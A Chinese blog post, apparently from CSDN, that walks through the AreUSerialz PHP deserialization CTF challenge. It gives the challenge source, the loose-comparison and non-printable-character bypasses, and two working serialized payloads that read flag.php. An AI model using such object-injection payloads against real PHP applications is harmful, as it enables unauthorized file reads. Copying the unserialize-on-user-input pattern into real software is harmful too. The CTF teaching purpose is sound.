网鼎杯 AreUSerialz反序列化题目

最新推荐文章于 2024-09-04 09:27:16 发布
最新推荐文章于 2024-09-04 09:27:16 发布
阅读量1k 收藏
点赞数 1
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/106062140
版权

看了网鼎杯 AreUSerialz反序列化题目wp
对php的反序列化又有了学到了新的知识点,之前都没注意到

标题题目是这样的:

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

   protected $op;

   protected $filename;

   protected $content;

   function __construct() {

        $op = "1";

        $filename = "/tmp/tmpfile";

        $content = "Hello World!";

        $this->process();   

    }
    public function process() {

        if($this->op == "1") {

            $this->write();       

        } else if($this->op == "2") {

            $res = $this->read();

            $this->output($res);

        } else {

            $this->output("Bad Hacker!");

        }
    }
    private function write() {

        if(isset($this->filename) && isset($this->content)) {

            if(strlen((string)$this->content) > 100) {

                $this->output("Too long!");

                die();

            }

            $res = file_put_contents($this->filename, $this->content);

            if($res) $this->output("Successful!");

            else $this->output("Failed!");

        } else {

            $this->output("Failed!");

        }

    }

    private function read() {

        $res = "";

        if(isset($this->filename)) {

            $res = file_get_contents($this->filename);

        }

        return $res;

    }



    private function output($s) {

        echo "[Result]: <br>";

        echo $s;

    }

    function __destruct() {

        if($this->op === "2")

            $this->op = "1";

        $this->content = "";

        $this->process();

    }
}

function is_valid($s) {

    for($i = 0; $i < strlen($s); $i++)

        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))

            return false;

    return true;

}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];

    if(is_valid($str)) {

        $obj = unserialize($str);
    }
}

简单看下代码,反序列化漏洞
protect里面可控

主要是绕过 is_vaild 函数,它规定了序列化内容中只能包含ascii可见字符

还有因为在进行read()之前就会调用__destruct()魔术方法
__destruct()方法内使用了严格相等 this->op === “2” process()
方法内使用了else if ( this->op == “2”)
所以这里使用弱类型2 == "2"绕过

第一种解法

出题用的php版本比较高,public属性可以覆盖替代protected

<?php
class FileHandler {
    public $op = 2;
    public $filename = "flag.php";
    public $content = "zeo";
}
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
$a = new FileHandler();
$b = serialize($a);

var_dump(is_valid($b));
print_r($b);

在这里插入图片描述

在这里插入图片描述

第二种解法

下面P牛之前的解释

PHP序列化的时候private和protected变量会引入不可见字符\x00,输出和复制的时候可能会遗失这些信息,导致反序列化的时候出错。

private属性序列化的时候会引入两个\x00,注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到,甚至导致截断,如图1,url编码后就可以看得很清楚了。
同理,protected属性会引入\x00*\x00。

此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。比如s:5:“A<null_byte>B”;̀ -> S:5:“A\00B\09\0D”;

把序列号后的s变成S就可以了,里面的字符就可以正常

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:6:"loecho";}
god_Zeo
关注
专栏目录
CTF-网鼎杯-青龙组AreUSerialz
wangechuizi0的博客
08-23 232
解题思路: 1.获取flag存储flag.php 2.存在两个魔术方法__construct()和__destruct() 3.传输str参数数据后触发destruct(),存在is_valid过滤 4.__destruct()中会调用process,其中op=1读取op=2写入 5.涉及对象FileHandler,变量op及filename,contect,进行构造输出 对代码进行审计 通过此处获取flag 两个魔术手法 传输str参数数据后触发destruct(),存在is_valid过滤,进行.
[网鼎杯 2020 青龙组]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 687
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
网鼎杯之php反序列化 AreUserialz
weixin_54431413的博客
04-16 2243
2020网鼎杯的php反序列化AreUserialz
【BUUCTF】AreUSerialz反序列化
最新发布
徐徐徐的博客
09-04 639
当遇到不可打印字符被过滤时,有两种方法:PHP版本>=7.2时,可将protected直接修改为public将序列化后的字符串中的%00修改为\00,并将保护类型为protected的变量的变量类型由s改为S。
PHP反序列化-2020-网鼎杯-青龙组-Web-AreUSerialz
m0_62770485的博客
04-17 3255
PHP反序列化 序列化(serialize)就是将对象转换为字符串。反序列化(unserialize)则相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象 访问控制 PHP 对属性或方法的访问控制,是通过在前面添加关键字 public(公有),protected(受保护)或 private(私有)来实现的。 public(公有):公有的类成员可以在任何地方被访问。 protected(受保护):受保护的类成员则可以被其自身以及其子类和父类访问。 private(私有):私有的类
反序列化题目
weixin_45090021的博客
09-10 119
本题需要绕过一个__wakeup()函数和一个正则匹配preg_match('/[oc]:\d+:/i', $var)__wakeup():在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过。绕过__wakeup()是利用CVE-2016-7124漏洞,即反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup( )的执行。正则匹配preg_match('/[oc]:\d+:/i', $var)如果出现的字符出现在存储的字典中则匹配成功。
网鼎杯SQLI+反序列化读取文件题解
weixin_34032792的博客
08-20 300
先注册一个账号,然后发现http://ede1e494b5d64ab8adc945efde6138b168f86c65a30e4a4f.game.ichunqiu.com/view.php?no=1存在注入 联合查询中union会被拦截,于是用注释符绕过http://ede1e494b5d64ab8adc945efde6138b168f86c65a30e4a4f.game.ichun...
CTF赛题-[网鼎杯2020青龙组]AreUSerialz
m0_57379855的博客
03-25 2156
CTF赛题-[网鼎杯2020青龙组]AreUSerialz代码审计构造函数 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filenam
[网鼎杯 2020 青龙组]AreUSerialz 1
bazzza的博客
12-21 2256
打开靶场,是一道php代码审计的题目,是个反序列化题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1721
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
网鼎杯2020[青龙组]--AreUSerialz
Oavinci的博客
06-28 7131
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6976
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
weixin_44632787的博客
06-25 756
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
网鼎杯2020php反序列化,网鼎杯2020[青龙组]--AreUSerialz
weixin_35304361的博客
04-15 513
知识点:PHP反序列化漏洞弱类型比较process();}public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->outp...
buuCTF-AreUSerialz_第二届网鼎杯web
Fisher
05-22 746
写在前面: web菜鸟,在做buuctf中的网鼎杯赛题的时候,有去学习了一遍php反序列,加深了理解。 为什么会用到序列化,自己的理解就是当一段代码消失时候,保存的数据也会跟着消失,但时如果要是再去使用这些数据的时候,如果在添加十分的不方便,于是就出现了序列化,将数据保存起来。 关键点: 1.我们想用反序列必须存在 unserialize(),且提交的变量可控。 unserialize():反序列化,将字符串转化为类。 serialize():序列化,将类转化为字符串。 2.可控的值,为class 类中的属
网鼎杯青龙组 web题-AreUSerialz
BROTHERYY的博客
06-27 396
//复现地址:https://buuoj.cn/challenges //开启环境后获得源码一份。 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $
web buuctf [网鼎杯 2020 青龙组]AreUSerialz1
weixin_44214568的博客
03-17 817
1.代码审计(魔法函数,序列化) 2.成员变量关键字 public、protected、private 代码粘贴如下: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
C#对象的序列化与反序列化详解
“C#序列化和反序列化是.NET框架中用于对象持久化和跨进程通信的重要技术。序列化是将对象转换为可存储或可传输的格式,如XML、JSON或二进制,以便保存对象的状态或在网络上传输。反序列化则是将这种格式的数据恢复...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值